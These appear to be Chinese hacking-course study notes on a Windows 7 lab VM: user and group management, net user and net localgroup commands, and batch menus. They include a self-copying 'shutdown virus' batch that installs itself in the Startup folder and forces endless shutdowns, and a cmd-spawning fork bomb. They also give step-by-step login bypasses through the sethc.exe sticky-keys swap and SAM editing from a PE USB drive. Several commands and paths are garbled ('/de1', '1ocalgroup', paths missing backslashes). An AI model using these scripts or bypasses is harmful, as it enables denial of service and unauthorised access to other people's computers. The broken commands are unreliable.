03.win7部署&用户和组管理

1. 部署win7虚拟机

• 新建文件夹，给win7建立一个虚拟家目录

• 下载好win7镜像，msdn提供下载

• 新建虚拟机，并将内存改为512m或1G，插入下载好的镜像

• 开机，安装系统

• 安装vm tools，重启

• 关闭防火墙

• 关闭自动更新

• 调出桌面图标

• 关机，做快照

2. 用户与组管理

用户对应着当前使用电脑的身份，不同的身份有着不同的权限。

2.1 服务器版本介绍

windows服务器系统：win2000 win2003 win2008 win2012

其中win2000市面上基本上没有用的啦，win2012和win2008功能差不多，只是桌面不一样

linux服务器系统：Redhat Centos

2.2 用户描述

• 每一个用户登录系统后，拥有不同的操作权限

• 每一个用户有自己唯一的SID（安全标识符）

• 用户SID: S-1-5-21-426206823-2579496042-14852678-500

• 系统SID: S-1-5-21-426206823-2579496042-14852671

  windows系统管理员administrator的UID是500
  普通用户的UID是1000开始
  

• 不同的账户拥有不同的权限，为不同的账户赋权限，也就是为不用账户的SID赋权限

• 查看用户: whoami

• 查看SID值: whoami /user

• 账户密码存储位置: c:windowssystem32configSAM #暴力破解/撞库

• windows系统上，默认密码最长有效期42天

2.3 内置账户

• 给人使用的账户:

  • Administrator #管理员账户
  • guest #来宾账户

• 计算机服务组件相关的系统账号

  • system #系统账户==权限至高无上
  • local services #本地服务账户==权限等于普通用户
  • network services #网络服务账户==权限等于普通用户

注意: 内置账号是不能删除的

2.4 配置文件

每个用户都有自己的配置文件(家目录)，在用户第一次登录时自动产生，路径是:

win7/win2008 c:用户

xp/win2003 c:Documents and Settings

2.5 用户管理命令

net user                           # 查看用户列表
net user 用户名 密码                 # 改密码
net user 用户名 密码 /add              # 创建一个新用户
net user 用户名 /de1                 # 删除一个用户
net user 用户名 /active:yes/no      # 激活或禁用账户
练习;
1、练习图形及命令行中，进行用户管理（包括创建、修改密码、删除用户、登录并验证家目录产生、及权限）
2、制作一个批处理脚本，可以实现互动创建用户!

无限关机病毒最终版

@echo off
copy mm.bat "%userprofile%AppDataRoamingMicrosoftWindowsStartMenuProgramsStartup"  

# 启动项路径最终版
# win7/win10都是这个路径,userprofile --> 当前用户配置文件的路径
shutdown -s -f -t 0

2.6 组管理

组的作用: 简化权限的赋予。

赋权限方式:

• 用户 ---> 组 ---> 赋权限
• 用户 ---> 赋权限

2.6.1 内置组

内置组的权限默认已经被系统赋予。

1) administrators         #管理员组
2) guests                 #来宾组
3) users                  #普通用户组，默认新建用户都属于该组
4) network                #网络配置组
5) print                  #打印机组
6) Remote Desktop         #远程桌面组

2.6.2 组管理命令

net localgroup                           #查看组列表
net 1ocalgroup 组名                       #查看该组的成员
net 1ocalgroup 组名 /add                  #创建一个新的组
net 1ocalgroup 组名 用户名 /add            #添加用户到组
net 1ocalgroup 组名 用户名 /del            #从组中踢出用户
net 1ocalgroup 组名 /del                  #删除组
练习:
1、练习图形及命令行中，进行组管理(创建组、组成员添加、查看组成员、成员脱离组、删除组)
2、创建1个普通用户1isi，并将1isi提升为管理员，并验证lisi是否成功取得管理员权限!

3. win7/win10破解开机密码

1、在未登录系统时，连续按5次shift键， 弹出程序C:windowssystem32sethc.exe
2、部分win7及win10系统在未进入系统时，可以通过系统修复漏洞篡改系统文件名!
注:如win7或win10系统已修补漏洞2，则无法利用

3.1 破解过程相关知识

1. cmd工具路径

C: windowssystem32cmd
2、用户/账户密码存储位置
c:windowssystem32configSAM
#非逆转型加密、使用hash值类似的方法、MD5 SHA

2. 修改账户密码:

net user 用户名 新密码

3.2 漏洞利用过程

案例:破解win7系统密码
实验步骤:
1、开启win7虚拟机，开机，并设置一个复杂密码:
2、关机，并开机，在出现windows启动界面时强制关机;
3、再开机，出现“启动修复(推荐)”及选择该项: #如为出现，多尝试儿次第2步，如还不行，请换其他方法
4、出现系统还原提示，点击取消，等待几分钟后，会出现问题原因，点击查看详细信息:
5、打开最后一个链接即一个记事本:
6、记事本中点打开，并选择显示所有文件:
7、找到sethc并改名sethc-bak,再找到cmd, 复制一份cmd改名为sethc
8、全部关闭，重启。
9、系统启动完毕后，连续按5次shift键，将弹出cmd工具，使用命令net user 用户名 新密码，将当前用户密码修改掉即可，或者另外建立1个用户，并提升为管理员，注销后，可再删除新建的用户，这样的好处为不修改当前用户的密码即可登录系统。

4. 冒号和goto的用法

: 用来划分区块

goto 用来跳转

如果你有编程基础, 你可以理解成是定义函数, 以及调用函数

编写一个有菜单选择的批处理文件:

@echo off
color 0a
title mn小程序

:menu
cls
echo ==================================
echo            1.定时关机
echo            2.蓝屏炸弹
echo            3.创建用户
echo            4.退出程序
echo ==================================
set /p num=请输入你的选择:

if "%num%"=="1" goto a
if "%num%"=="2" goto b
if "%num%"=="3" goto c
if "%num%"=="4" goto d
echo 他妈的,不看序号的吗?傻逼,乱输入,看清楚点.
pause
goto menu

:a
set /p time=请输入关机倒计时(单位:秒,时间不能大于1000):
shutdown -s -f -t %time%
goto menu

:b
echo 我是蓝屏炸弹
goto menu


:c
set /p user=请输入用户名:
set /p pwd=请输入密码:
net user %user% %pwd% /add
echo 用户%user%已经创建成功!
pause
goto menu

:d
exit

# 无限打开cmd,暴力破坏电脑
:a
start cmd
goto a

5. 破解登录密码

• 假装忘记密码!

• 第一步: 准备一个空U盘(记着备份u盘中的数据)

• 第二步: 准备一个PE系统制作工具(新与18可以破解的系统版本不一样)链接

  • xp pe/win 7 pe/win10pe (老毛桃,大白菜，U深度)
  • PE系统: 微型维修系统, 将PE系统安装到U盘中,虚拟机的话是一个ISO文件

• 第三步: 插入U盘,并运行pe软件,然后点击一键安装! 此时u盘就变成了pe启动盘

• 第四步: 将U盘插入要破解密码的电脑设备上!

• 第五步:开机，马上立即赶紧狂按E2或者F1或者esc,进入bios ( 虚拟机直接进入固件 ), 去修改启动顺序!

• 第六步:开机,进入PE系统，此时你也可以看见一个桌面，桌面上一般有一个篡改SAM文件的工具,运行这个工具，并打开sam文件,直接修改密码!

• 第七步:拔掉U盘 ( 虚拟机是把两个连接取消 ), 重启电脑